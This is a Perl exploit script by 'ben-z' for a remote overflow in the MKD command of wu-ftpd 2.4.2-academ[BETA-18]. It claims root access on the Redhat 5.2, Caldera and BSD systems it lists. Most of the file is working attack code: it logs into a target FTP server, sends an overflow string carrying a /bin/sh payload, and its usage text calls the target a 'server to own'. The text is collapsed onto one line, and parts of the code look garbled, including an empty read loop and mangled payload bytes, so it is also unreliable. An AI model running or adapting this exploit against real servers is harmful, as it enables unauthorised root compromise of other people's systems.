#!/usr/bin/perl # ABOUT: # wu-ftpd.pl v1 by ben-z !! wu-2.4.2-academ[BETA-18](1) remote overflow. # exploits a flaw in the MKD function of wu-ftpd to remotely compromise # a system and obtain root access. below is a list of affected systems. # # System | Description | Vulnerable # -------------------------------------------------------------------- # Redhat 5.2 | installed by default | yes # Caldera 1.3 | installed by default | yes # *bsd | usually installed | yes # -------------------------------------------------------------------- # # THANKS: # #fts(2), #bitchx, #slackware, #violators @ undernet.org # #underground and #slackware @ irc.psychic.com # everyone on irc.slacknet.org, metalman, eklipz, axion, madli0n, # chawp, aj, magicfx, rhodie, dpad, fenix, and folk. # # ANTI-THANKS: # bXlogic your lame and everyone hates you. stop ripping my code^M print "===================================================================\n"; print "= : brought to you by ben-z and #fts(2)\@undernet.org =\n"; print "===================================================================\n\n"; $length=256; $ARGC=@ARGV; if ($ARGC <3) { print ": Syntax: $0 [offset(256)]\n"; print "-- Host: address of wu-ftpd server to own --\n"; print "-- Directory: the full path of a directory has write access to\n"; print "-- Login: ftp login name (Anonymous if you dont have an account) --\n"; print "-- Password: ftp password (if Anonymous, use an email address)\n"; print "-- Offset: length of string to use (the default should work)\n"; exit; } use Socket; my($remote,$port,$iaddr,$paddr,$proto,$line); $remote=$ARGV[0]; $port = "21"; $rdir=$ARGV[1]; $rlogin=$ARGV[2]; $rpass=$ARGV[3]; if ($ARGV[4]) { $length=$ARGV[4]; } $string="?" x $length; print ": Attempting overflow on $remote [offset: $length]\n"; $iaddr = inet_aton($remote) or die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) or die "Error: $!"; $proto = getprotobyname('tcp') or die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!"; connect(SOCK, $paddr) or die "Error: $!";; $msg = "USER $rlogin\n"; send(SOCK, $msg, 0) or die "Unable to send packet: $!"; $msg = "PASS $rpass\n"; send(SOCK, $msg, 0) or die "Unable to send packet: $!"; $msg = "CWD $rdir\n"; send(SOCK, $msg, 0) or die "Unable to send packet: $!"; $msg = "MKD $string\Hüÿ¿Hüÿ¿bin/sh\n"; send(SOCK, $msg, 0) or die "Unable to send packet: $!"; send(SOCK, $msg, 0) or die "Server Error! (patched): $!"; $msg = "MKD bin\n"; send(SOCK, $msg, 0) or die "Unable to send packet: $!"; $msg = "CWD bin\n"; send(SOCK, $msg, 0) or die "Unable to send packet: $!"; $msg = "MKD sh\n"; while () { print; } print ": done. please visit http://www.slacknet.org\n"; exit;